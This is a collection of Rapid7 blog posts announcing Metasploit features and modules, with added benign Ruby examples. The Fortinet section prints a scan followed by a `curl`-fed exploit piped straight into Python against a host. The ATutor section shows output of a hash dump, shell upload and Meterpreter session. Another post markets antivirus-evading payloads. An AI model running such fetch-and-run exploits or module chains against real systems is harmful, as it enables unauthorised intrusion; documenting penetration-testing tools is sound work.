Rapid7 Blog

Release Notes  

Weekly Metasploit Wrapup

Powershell? In my Meterpreter?

It's more likely than you think! Hot on the heels of his fantastic Python extension, the legendary OJ Reeves has once again busted out an awesome new ability for post-exploitation, this time by putting a fully functional powershell inside your native Windows Meterpreter sessions. Unlike the Python extension, which uploads an embedded interpreter, the new powershell extension loads the .NET runtime from the victim system. There's a lot of polish and more work to be done here, but the shell is quite functional and gives you access to all kinds of capabilities. The next big improvement here is the ability to import files so you can take advantage of existing PS scripts, which is already in testing and should be out with the next update if everything goes to plan.

Metasploit3 is dead, long live MetasploitModule

Metasploit modules all define a class to implement their functionality. In the original plan, that class's name contained Metasploit's major version number so it would be possible to tell if a module was compatible. The way it really happened is the number just sat there doing nothing, since the major version changes very infrequently. The most recent time was just after the project was acquired by Rapid7 a little over six years ago. Before that, the last time the major version changed was when the project was rewritten from scratch in 2005, ported from Perl to Ruby. In the last six years, many things have changed considerably -- APIs have been updated, moved, or deleted; new protocols have been added; someone injected SNES shellcode into Super Mario World by hand -- the world is a different place now. Basically, the idea that the major version would describe whether something is compatible was never real. So we've decided to get rid of the confusing, pointless number in modules' class names and just call them MetasploitModule.

Your existing custom modules will continue to work without modification, but with a warning that you should update the module's class name. You can make that update to all your custom modules with this one-liner:

```shell
find ~/.msf4/modules -name '*.rb' | xargs sed -i 's/class Metasploit[34]/class MetasploitModule/'
```

If you're on OS X, your sed(1) is dumb and requires an argument to -i:

```shell
find ~/.msf4/modules -name '*.rb' | xargs sed -i '' 's/class Metasploit[34]/class MetasploitModule/'
```

Up Up Down Down UDP Select Start

One of my favorite things about Metasploit is its socket abstractions. The ability to create sockets from a Meterpreter session and treat them as a regular Ruby socket is very powerful -- it's what powers port forwarding and routing. Recently it came to long-time contributor sempervictus' attention that UDP didn't behave quite the same way as TCP in this regard. Because UDP sockets created on a Meterpreter session didn't return a normal socket, they couldn't be passed to the low-level select method. Now that UDP works just like TCP, it opens up some new ways we can use them for ~~evil~~ awesome.

Words, Words, Words

This update comes with several improvements to documentation. The first is a tool called find_release_notes that allows you to find the release notes for a given pull request or module, so you can quickly figure out the historical context of when a thing made it into the stable release. You can find it in the tools/dev directory. Next, we've added some new templates for submitting GitHub Issues and Pull Requests, which will hopefully standardize the process of contributing and make it a little easier for contributors. Knowing what is expected beforehand means less back-and-forth for new contributors, smoothing out and speeding up the whole Pull Request process. And my favorite new documentation addition in this update is a way of documenting individual modules. A new directory, documentation/modules/, matches the layout of modules/ and contains markdown files describing how the corresponding module can best be utilized. A handful of the most important modules already have documentation and more are on the way. The great thing about it is it's just markdown, so it's super easy to write, and incidentally writing simple walkthroughs of existing modules is a great place to get started contributing. To check it out, you can use the info command's new -d flag (for "documentation") to turn that markdown into a nice HTML page and view it in a browser. There are more details in the wiki article Generating Module Documentation.

New Modules

Exploit modules (1 new)

- PHP Utility Belt Remote Code Execution by Jay Turla and WICS

Auxiliary and post modules (5 new)

- Android Stock Browser Iframe DOS by Jean Pascal Pereira and Jonathan Waggoner exploits CVE-2012-6301
- HTTP Client Information Gather by sinn3r
- EasyCafe Server Remote File Access by Brendan Coles and R-73eN
- Apache Karaf Default Credentials Command Execution by Nicholas Starke
- Multi Manage Set Wallpaper by timwr

Get it

As always, you can update to the latest Metasploit Framework with a simple msfupdate, and the full diff since the last blog post is available on GitHub: 4.11.14...4.11.19
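As an added example (not from the original post or from the Metasploit project), here is a Ruby equivalent of the sed one-liner for the MetasploitModule rename, with a dry-run mode so you can list which of your custom modules still carry the old class names before anything is rewritten. The helper names, the temporary directory layout and the sample module are constructed for the demonstration; your real modules live under ~/.msf4/modules as the post says.

```ruby
# Added example (not from the Rapid7 post): a Ruby equivalent of the sed
# one-liner that renames Metasploit3/Metasploit4 module classes, with a
# dry-run mode. Helper names, paths and the sample module are constructed.
require 'tmpdir'
require 'fileutils'

# Matches the old class declaration at the start of a line, whatever the
# superclass, e.g. "class Metasploit3 < Msf::Exploit::Remote". Unlike the
# bare sed pattern this is anchored, so a mention inside a comment or
# string elsewhere on a line is left alone.
OLD_CLASS_RE = /^([ \t]*)class Metasploit[34]\b/

# Returns [new_source, changed?]; source already using MetasploitModule
# (or not a module at all) comes back unchanged.
def rewrite_module_class(source)
  updated = source.gsub(OLD_CLASS_RE, '\1class MetasploitModule')
  [updated, updated != source]
end

# Walks a module tree and rewrites every module still using the old class
# names. With dry_run: true it only reports. Returns the affected paths.
def update_module_tree(root, dry_run: false)
  changed = []
  Dir.glob(File.join(root, '**', '*.rb')).sort.each do |path|
    updated, did_change = rewrite_module_class(File.read(path))
    next unless did_change
    changed << path
    File.write(path, updated) unless dry_run
  end
  changed
end

# Constructed sample: a minimal custom module written in the old style.
SAMPLE_OLD_MODULE = <<~RUBY
  require 'msf/core'

  class Metasploit3 < Msf::Auxiliary
    def initialize(info = {})
      super(update_info(info, 'Name' => 'Example', 'License' => MSF_LICENSE))
    end

    def run
      print_status('hello')
    end
  end
RUBY

# Dry run, real rewrite, then a second dry run, all in a throwaway tree.
# Returns [files the dry run flagged, files still old after the rewrite].
def demo
  Dir.mktmpdir do |dir|
    mod_dir = File.join(dir, 'modules', 'auxiliary', 'example')
    FileUtils.mkdir_p(mod_dir)
    File.write(File.join(mod_dir, 'old.rb'), SAMPLE_OLD_MODULE)
    File.write(File.join(mod_dir, 'new.rb'),
               SAMPLE_OLD_MODULE.sub('Metasploit3', 'MetasploitModule'))

    flagged = update_module_tree(dir, dry_run: true)   # old.rb only
    update_module_tree(dir)                            # rewrites old.rb
    still_old = update_module_tree(dir, dry_run: true) # nothing left
    [flagged.map { |p| File.basename(p) }, still_old.size]
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Run it with a dry run first against a copy of your module directory; the sed command in the post does the same rewrite in one pass but reports nothing, which is fine for a tree you fully own and less fine for one shared with other people.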
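As an added example (not from the original post), the following Ruby shows what treating a UDP socket "as a regular Ruby socket" buys you: the socket can be handed to IO.select with a timeout, which is the property port forwarding relies on. These are plain local UDPSockets rather than Meterpreter channels; the loopback addresses, payload and timeouts are constructed for the demonstration.

```ruby
# Added example (not from the Rapid7 post): a UDP socket that really is a
# Ruby IO can be multiplexed with IO.select. Local loopback sockets stand
# in for Meterpreter-backed ones; addresses and payload are constructed.
require 'socket'

# Sends payload over UDP on loopback and waits up to timeout seconds for it
# to arrive. Returns the received bytes, or nil if select times out.
def udp_roundtrip_with_select(payload, timeout: 1.0)
  receiver = UDPSocket.new
  receiver.bind('127.0.0.1', 0)              # ephemeral port
  sender = UDPSocket.new
  port = receiver.addr[1]

  sender.send(payload, 0, '127.0.0.1', port)

  # The whole point of the update: the socket is selectable, so a forwarder
  # can wait on many of them at once instead of blocking on one recvfrom.
  ready, = IO.select([receiver], nil, nil, timeout)
  return nil if ready.nil?
  data, _addr = receiver.recvfrom(65_535)
  data
ensure
  receiver&.close
  sender&.close
end

# The failure mode: with nothing in flight, select must time out (returning
# nil) rather than block forever. Returns true when it timed out cleanly.
def udp_select_timeout(timeout: 0.2)
  sock = UDPSocket.new
  sock.bind('127.0.0.1', 0)
  ready, = IO.select([sock], nil, nil, timeout)
  ready.nil?
ensure
  sock&.close
end
```

The timeout branch matters in practice: a forwarder that blocks on a datagram that never arrives ties up the session, so every select on a UDP channel should carry a bound.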

Weekly Metasploit Wrapup

Scanning for the Fortinet backdoor with Metasploit

Written by wvu

Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out!

```text
wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL
msf > use auxiliary/scanner/ssh/fortinet_backdoor
msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24
rhosts => 417.216.55.0/24
msf auxiliary(fortinet_backdoor) > set threads 100
threads => 100
msf auxiliary(fortinet_backdoor) > run

[*] Scanned  35 of 256 hosts (13% complete)
[*] Scanned  84 of 256 hosts (32% complete)
[*] Scanned  90 of 256 hosts (35% complete)
[+] 417.216.55.69:22 - Logged in as Fortimanager_Access
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 174 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 233 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(fortinet_backdoor) >
[1]+  Stopped                 ./msfconsole -qL
wvu@kharak:~/metasploit-framework:master$ python <(curl -s https://www.exploit-db.com/download/39224) 417.216.55.69
FortiGate-VM64 #
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
exit        Exit the CLI.

FortiGate-VM64#
```

Easy as can be. The module doesn't get sessions yet due to complications with net-ssh, but we're working on it!

Shall we play a game, ATutor?

Written by Bill Webb

Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies? Now you can with the addition of the ATutor 2.2.1 SQL injection module. This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrator's interface. While reaching the vulnerability requires one to log in to ATutor as a student, remote registration is enabled by default. Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ...

```text
msf exploit(atutor_sqli) > check
[+] The target is vulnerable.
msf exploit(atutor_sqli) > exploit

[*] Started reverse TCP handler on 192.168.1.199:4444
[*] 192.168.1.202:80 - Logged in as admin, sending a few test injections...
[*] 192.168.1.202:80 - Dumping username and password hash...
[+] 192.168.1.202:80 - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !
[*] 192.168.1.202:80 - Logged in as admin, uploading shell...
[+] 192.168.1.202:80 - Shell upload successful!
[*] Sending stage (33684 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.202:49271) at 2016-02-29 18:44:11 -0600
[+] 192.168.1.202:80 - Deleted ocfw.php
[+] 192.168.1.202:80 - Deleted ../../content/module/qee/ocfw.php

meterpreter >
```

... or pulling off their best Matthew Broderick impersonation. It's almost like it's 1983 again. (We can't guarantee that the ladies will in fact be impressed ...)

New modules

Exploit modules (3 new)

- ATutor 2.2.1 SQL Injection / Remote Code Execution by mr_me exploits CVE-2016-2555
- NETGEAR ProSafe Network Management System 300 Arbitrary File Upload by Pedro Ribeiro exploits CVE-2016-1525
- AppLocker Execution Prevention Bypass by Casey Smith and OJ Reeves

Auxiliary and post modules (6 new)

- NETGEAR ProSafe Network Management System 300 Authenticated File Download by Pedro Ribeiro exploits CVE-2016-1524
- Apache Karaf Default Credentials Command Execution by Nicholas Starke
- Linknat Vos Manager Traversal by Nixawk
- Dahua DVR Auth Bypass Scanner by Jake Reynolds, Jon Hart, Nathan McBride, and Tyler Bennett exploits CVE-2013-6117
- Fortinet SSH Backdoor Scanner by wvu and operator8203 exploits CVE-2016-1909
- Apache Karaf Login Utility by Brent Cook, Dev Mohanty, Greg Mikeska, Peer Aagaard, and Samuel Huckins

Get it

As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.

Weekly Metasploit Wrapup

I'm not your mother, clean up after yourself.

An old friend of mine, axis2deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done, and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metasploit will use it to delete your mess.

Code of Conduct

The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct. Here's an excerpt that explains the motivation:

> We are committed to making participation in this project a harassment-free experience for everyone, regardless of level of experience, gender, gender identity and expression, sexual orientation, disability, personal appearance, body size, race, ethnicity, age, religion, or nationality.

This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community, as well as providing guidelines so people know what to expect when such things must be enforced.

> Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.

For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along. The previous law of the land in the People's Republic of Metasploit was an informal adherence to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request.

New Modules

Auxiliary and post modules

- Windows Gather Active Directory Managed Groups by Stuart Morgan
- Windows Manage Privilege Based Process Migration by Josh Hale and theLightCosine

Get it

As always, you can update to the latest Metasploit Framework with a simple msfupdate, and the full diff is available on GitHub: 4.11.6...4.11.7

Happy hacking.
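As an added example (not Metasploit's own code), the following Ruby models the FileDropper contract described above so that the register-then-cleanup flow can be run locally: a path is registered before the file is dropped, and once a session exists every registered path is removed. CleanupTracker, LocalSession and DemoModule are hypothetical stand-ins; in a real module you instead `include Msf::Exploit::FileDropper` and call `register_file_for_cleanup(remote_path)`, and the framework performs the deletion through the new session. The temporary directory and file names are constructed.

```ruby
# Added example (not from the Rapid7 post or the Metasploit code base): a
# local stand-in for the FileDropper mixin's register/cleanup contract.
# CleanupTracker, LocalSession and DemoModule are hypothetical names.
require 'tmpdir'

module CleanupTracker
  # Remember a path we are about to drop on the target. Registering before
  # the upload means a crash mid-exploit still leaves a record to clean.
  def register_file_for_cleanup(*paths)
    @dropped_files ||= []
    @dropped_files.concat(paths)
  end

  # Called once a session exists: deletes every registered path, most
  # recently registered first, and returns [deleted, failed] path lists.
  # Paths that could not be deleted stay registered for a later attempt.
  def on_new_session(session)
    deleted = []
    failed = []
    (@dropped_files || []).reverse_each do |path|
      (session.rm(path) ? deleted : failed) << path
    end
    @dropped_files = failed.reverse
    [deleted, failed]
  end
end

# Stand-in for a session: rm deletes a local file and reports success.
class LocalSession
  def rm(path)
    File.delete(path)
    true
  rescue SystemCallError
    false
  end
end

# A toy "module" that drops two files into target_dir and returns their paths.
class DemoModule
  include CleanupTracker

  def exploit(target_dir)
    %w[payload.jsp helper.txt].map do |name|
      path = File.join(target_dir, name)
      register_file_for_cleanup(path)          # register BEFORE dropping
      File.write(path, '<constructed payload>')
      path
    end
  end
end

# Runs the flow in a throwaway directory and reports what happened,
# including how many dropped files are still on "disk" afterwards.
def demo_cleanup
  Dir.mktmpdir do |dir|
    mod = DemoModule.new
    dropped = mod.exploit(dir)
    deleted, failed = mod.on_new_session(LocalSession.new)
    { deleted: deleted.size, failed: failed.size,
      remaining: dropped.count { |p| File.exist?(p) } }
  end
end

# A file that vanished before cleanup (e.g. removed by AV) is reported as
# failed rather than raising, so the session setup is not aborted.
def demo_missing_file
  mod = DemoModule.new
  mod.register_file_for_cleanup('/nonexistent/constructed/path.jsp')
  deleted, failed = mod.on_new_session(LocalSession.new)
  [deleted.size, failed.size]
end
```

The two behaviours worth copying from the real mixin are visible here: register the path before the upload rather than after, and treat a failed delete as something to report, not something that aborts the session.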

Weekly Metasploit Wrapup

Aaaaaand we're back! Last week was the first weekly update of the year, and it comes with some super fun stuff.

Tunneling

The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session to tunnel connections back to your payload handler. Here's an example run to give you the idea:

```text
msf exploit(payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1
msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >
```

The really important line there is this:

```text
[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
```

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost; you can tell it to listen on an external address and use psexec against a second internal machine. This used to be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules

Joomla

This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit will be faster and easier.

Hacking Time

From the module description:

> The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

Exploit modules

- Joomla HTTP Header Unauthenticated Remote Code Execution by Christian Mehlmauer and Marc-Alexandre Montpas exploits CVE-2015-8562

Auxiliary and post modules

- Android Stock Browser Iframe DOS by Jean Pascal Pereira and Jonathan Waggoner exploits CVE-2012-6301
- NTP "NAK to the Future" by Jon Hart and Matthew Van Gundy of Cisco ASIG exploits CVE-2015-7871
- Redis File Upload by Jon Hart and Nixawk
- MS15-134 Microsoft Windows Media Center MCL Information Disclosure by sinn3r and Francisco Falcon exploits CVE-2015-6127
- Post Windows Gather NTDS.DIT Location by Stuart Morgan

As always, you can get all these modules and improvements with a simple msfupdate, and the full diff is available on GitHub: 4.11.5-2015121501...4.11.5-2016010401

Weekly Metasploit Wrapup

Welcome to the last Metasploit update of the year! Since January 1st, 2015, we've had 6364 commits from 176 unique authors, closed 1119 Pull Requests, and added 323 modules. Thank you all for a great year! We couldn't have done it without you.

Sounds

The sounds plugin has been around for a long time, notifying hackers of new shells via their speakers since 2010. Recently, Wei "sinn3r" Chen gave it a makeover, replacing the old robotic voice with that of Offensive Security founder, Kali Linux Core Developer, and all-around cool guy Mati "muts" Aharoni. Now when you get a new session, you'll be treated to his sultry voice congratulating you, and when an exploit fails, he'll encourage you to try harder. Just type "load sounds" in msfconsole to hear it in action.

New Modules

We have eight new modules this week -- 5 exploits and 3 post modules. Among them is an exploit for Jenkins that takes advantage of the java deserialization issue brought to the world's attention by FoxGlove Security a few weeks ago. More exploits for similar vulnerabilities are undoubtedly on the way.

Exploit modules

- Jenkins CLI RMI Java Deserialization Vulnerability by juan vazquez, Christopher Frohoff, Dev Mohanty, Louis Sato, Steve Breen, Wei Chen, and William Vu exploits CVE-2015-8103
- phpFileManager 0.9.8 Remote Code Execution by Jay Turla and hyp3rlinx
- Legend Perl IRC Bot Remote Code Execution by Jay Turla exploits OSVDB-121681
- Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution by Conor Patrick, Jay Turla, and Matt Thayer
- ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability by sinn3r exploits CVE-2015-8249

Auxiliary and post modules

- UNIX Gather RSYNC Credentials by Jon Hart
- Bitlocker Master Key (FVEK) Extraction by Danil Bazin
- Windows Antivirus Exclusions Enumeration by Andrew Smith and Jon Hart

Get it

As always, you can get all these modules and improvements with a simple msfupdate, and the full diff is available on GitHub: 4.11.5-2015120901...4.11.5-2015121501

Weekly Metasploit Wrapup

Python extension for Windows Meterpreter

Meterpreter offers some pretty powerful post-exploitation capabilities, from filesystem manipulation to direct Windows API calls with railgun, and everything in between. One thing that's been missing for a long time is on-victim scripting. With this update comes an experimental Python extension to remedy that. It's still in its infancy, so expect some kinks to be worked out over the next few weeks, but it is functional. OJ's excellent Pull Request offers some insights into how it works and where it's going.

New Modules

This update also includes a few PHP code execution exploits, including one for the very popular vBulletin, a cheeky one for a cute backdoor used by Chinese attackers according to the great analysis by FireEye, and one for Up.Time.

Up.Time, the tale of a bad patch

In late 2013, we published an exploit module by Denis Andzakovic targeting Up.Time, an IT infrastructure monitoring tool. As part of the initial advisory, the researcher quoted the vendor saying:

> As a policy to protect our customers, we do not discuss any vulnerabilities with outside companies.

Which apparently includes the person reporting the vulnerability. And indeed, there doesn't seem to be any public discussion of this vuln (or any others for that matter) from the vendor, not even a mention of when a patch was available. It turns out that, whenever that patch came out, it didn't actually fix the vulnerability, and thanks to contributors Ewerson Guimaraes and Gjoko Krstic, we now have an exploit that targets the latest Up.Time versions 7.4 and 7.5.

Exploit modules

- China Chopper Caidao PHP Backdoor Code Execution by Nixawk
- ManageEngine ServiceDesk Plus Arbitrary File Upload by Pedro Ribeiro exploits ZDI-15-396
- Th3 MMA mma.php Backdoor Arbitrary File Upload by Jay Turla
- Nibbleblog File Upload Vulnerability by Roberto Soares Espreto and Unknown
- Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload by Denis Andzakovic exploits OSVDB-100423
- Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload by Denis Andzakovic, Ewerson Guimaraes (Crash), and Gjoko Krstic (LiquidWorm)
- vBulletin 5.1.2 Unserialize Code Execution by Julien (jvoisin) Voisin, Netanel Rubin, and cutz exploits CVE-2015-7808
- Zpanel Remote Unauthenticated RCE by Balazs Makany, Jose Antonio Perez, brad wolfe, brent morris, dawn isabel, and james fitts exploits OSVDB-102595
- Safari User-Assisted Applescript Exec Attack by joev exploits CVE-2015-7007
- Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation by rebel and shandelman116 exploits CVE-2015-5889
- Wordpress Ajax Load More PHP Upload Vulnerability by Roberto Soares Espreto and Unknown
- X11 Keyboard Command Injection by xistence
- Watermark Master Buffer Overflow (SEH) by Andrew Smith and metacom exploits CVE-2013-6935
- HP SiteScope DNS Tool Command Injection by Charles Riggs, Juan Vazquez, and Kirk Hayes

Auxiliary and post modules

- Joomla Real Estate Manager Component Error-Based SQL Injection by Nixawk and Omer Ramic
- Joomla com_contenthistory Error-Based SQL Injection by Asaf Orpani, Nixawk, and bperry exploits CVE-2015-7297
- BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure by Brad Wolfe, James Fitts, and Jay Turla exploits CVE-2015-7602
- PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure by Brad Wolfe, James Fitts, and Jay Turla exploits CVE-2015-7601
- ElasticSearch Snapshot API Directory Traversal by Benjamin Smith, Jose A. Guasch, and Pedro Andujar exploits CVE-2015-5531
- HTTP Host Header Injection Detection by Jay Turla and Medz Barao
- ManageEngine ServiceDesk Plus Path Traversal by xistence

Get it

As always, all the changes since the last wrapup can be had with a simple msfupdate, and the full diff is available on github: 4.11.5-2015110801...4.11.5-2015111801

Weekly Metasploit Wrapup

One of the greatest things about Metasploit is that it supports lots of different protocols and technologies that you would otherwise need a huge menagerie of tools to be able to talk to, an ever-expanding bubble of interoperability that you didn't have to write. Due to some great ongoing work by Bigendian Smalls, the bubble is getting even bigger, now encompassing shell sessions on mainframes. You can see the beginnings in #6013 and #6067.

New Modules

This update also comes with a fun privilege escalation exploit for OSX where an environment variable ends up on a commandline. I love these kinds of bugs because people have been screwing up environment variables since the invention of shells.

As always, you can see all the changes since the last wrapup on github: 4.11.4-2015102801...4.11.5-2015103001

Exploit modules

- Th3 MMA mma.php Backdoor Arbitrary File Upload by Jay Turla
- Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation by rebel and shandelman116 exploits CVE-2015-5889

Auxiliary and post modules

- Joomla Real Estate Manager Component Error-Based SQL Injection by Nixawk and Omer Ramic
- Joomla com_contenthistory Error-Based SQL Injection by Asaf Orpani, Nixawk, and bperry exploits CVE-2015-7297

New Metasploit 4.9 Helps Evade Anti-Virus Solutions, Test Network Segmentation, and Increase Productivity for Penetration Testers

Metasploit 4.9 helps penetration testers evade anti-virus solutions, generate payloads, test network segmentation, and generally increase productivity through updated automation and reporting features. Since version 4.8, Metasploit has added 67 new exploits and 51 auxiliary and post-exploitation modules to both its commercial and open source editions, bringing our total module count up to 1,974. The new version is available immediately.

Generate AV-evading Dynamic Payloads

Malicious attackers use custom payloads to evade anti-virus solutions. Because traditional Metasploit Framework payloads are open source and well known to AV vendors, they are often quarantined by AV solutions when conducting a penetration test, significantly delaying an engagement or even stopping a successful intrusion, giving the organization a false sense of security. Penetration testers must therefore have the ability to evade AV solutions to simulate realistic attacks.

The new Metasploit Pro 4.9 generates Dynamic Payloads that evade detection in more than 90% of cases and has the ability to evade all ten leading anti-virus solutions by creating a unique payload for each engagement that does not demonstrate the typical behavior flagged by heuristic algorithms. Dynamic Payloads significantly increase the productivity of a penetration tester by saving many hours of creating custom payloads, as well as the trial and error of evading detection through encoding, and ensure that organizations do not fall prey to a false sense of security.

With Dynamic Payloads, you'll have these advantages:

- Evade all leading anti-virus vendors: Dynamic Payloads evade the top 10 AV solutions in more than 90% of cases. No AV vendor detects all MSP payload options!
- More stable sessions: Dynamic Payloads use error corrections to make sessions more stable than regular MSF sessions
- IPS Evasion through stage encoding: Stager will encode the traffic when downloading the payload, which can help evade IPS

Dynamic payloads are exclusive to Metasploit Pro. To test the new AV evasion, get your free Metasploit Pro trial now.

Free Webcast: Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro

If you would like to learn more about how Dynamic Payloads are used to evade anti-virus solutions, join us on the free webcast "Evading Anti-Virus Solutions with Dynamic Payloads in Metasploit Pro" with Metasploit engineer David Maloney.

- Register for Americas time zone & on-demand
- Register for European time zone

Easily generate stand-alone payloads with the Payload Generator

Penetration testers sometimes need a stand-alone payload to install on a machine they have compromised and want to control. Generating stand-alone payloads with msfvenom in Metasploit Framework is very cumbersome even for the most experienced Framework user. The new Payload Generator makes it very easy to generate Classic Payloads for any platform, architecture, stager, stage, encoding and output format.

The Payload Generator with Classic Payloads is available in the free Metasploit Community Edition as well as the commercial editions Metasploit Express and Metasploit Pro. Dynamic Payloads can also be downloaded as stand-alone executables and are exclusive to Metasploit Pro. To test the new payload generator, get your free Metasploit Community license or free Metasploit Pro trial now.

Test whether your network segmentation is operational and effective

Network segmentation is a security best practice that can help contain a breach to one part of the network by splitting a computer network into subnetworks, the so-called segments. While network segmentation is not required by PCI DSS, it is often used to limit the scope of the network falling under PCI compliance. This can drastically limit the effort and cost of PCI compliance.

However, there is plenty of room for error in setting up network segmentation, and many companies learned this the hard way. In an interview with SearchSecurity, Troy Leach, CTO of the PCI Security Standards Council, said: "In the past, we've seen compromises where organizations thought they were doing the right thing, adequately segmenting off what they deemed to be their CDEs, only to find [the security controls were] never tested appropriately."

As a result, PCI version 3.0 added requirement 11.3.4, which requires that you conduct a penetration test to verify that your network segmentation is operational and effective. You need to be compliant by June 30, 2015.

Metasploit Pro 4.9 adds a new MetaModule for testing whether network segmentation is operational and effective. The MetaModule requires a target server, e.g. on a laptop, in the target network so that Metasploit Pro can test for open ports between the Metasploit Pro instance and the testing server.

This and other MetaModules are exclusive to Metasploit Pro. To test your network segmentation, get the free Metasploit Pro trial now.

Boost your productivity with new and improved Task Chains

Security assessments contain many repetitive and tedious tasks, and long waiting times in between. This is not only frustrating for you as a penetration tester but also increases the cost of engagements to a level where it's not feasible to test on a regular basis. In a recent survey with more than 2,000 Metasploit users, Metasploit Pro users said that they save 45% of time compared to using Metasploit Framework. With Metasploit Pro 4.9, we're increasing your productivity even further.

Using the new Task Chains' drag & drop interface, you can create custom workflows, either for running on-demand or on a one-time or repeated schedule. For example, you could schedule a network discovery scan, followed by a single pass of MS08-067 exploitation, looting of credentials and screenshots, and an iterative login with known credentials and looting more credentials to come back to an owned network the next morning. Or you could watch it run while focusing on other tasks.

What would you do with the extra time you've gained from added productivity? You could conduct more assessments, focus your efforts on tasks that really require your expertise, clean up your inbox, or just get home earlier in the day.

Task chains are exclusive to Metasploit Pro. To start creating your custom workflows, get the free Metasploit Pro trial now.

Enjoy a more powerful Meterpreter payload

Since the 4.8 release, we have greatly improved Meterpreter's capabilities and reliability. While we were at it, we overhauled the Windows and POSIX Meterpreter development environment to make it easier to set up for researchers and open source contributors.

Exciting new Meterpreter functions include:

- Monitor clipboards: automatically download contents of the target's clipboard, continuously for the life of the session
- Have a two-way video chat with your victim: have a heart-to-heart with your compromised client system, in real time
- Query ADSI and WMI: enables hardcore Windows Domain hackers to rifle through Active Directory records
- Access cleartext credentials: snarf in-memory passwords on 32-bit and 64-bit platforms with improved Mimikatz
- Impersonate in-memory tokens: with the new and improved Incognito extension

Test your network with 118 new exploits, auxiliary and post-exploitation modules

Metasploit is constantly updating its arsenal of exploits, auxiliary and post-exploitation modules to ensure that you're testing your network against the latest threats. We believe that sharing vulnerabilities and exploits broadly with the community increases security for everyone, which is why we also make all of our modules available in our free editions, Metasploit Framework and Metasploit Community.

We're adding new exploits at a rate of 1.2 per day, and here's what we've added since version 4.8:

Exploit modules

- Android Browser and WebView addJavascriptInterface Code Execution by joev and jduck
- Firefox Exec Shellcode from Privileged Javascript Shell by joev
- Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal by Ramon de C Valle exploits CVE-2013-2068
- Kloxo SQL Injection and Remote Code Execution by juan vazquez and Unknown
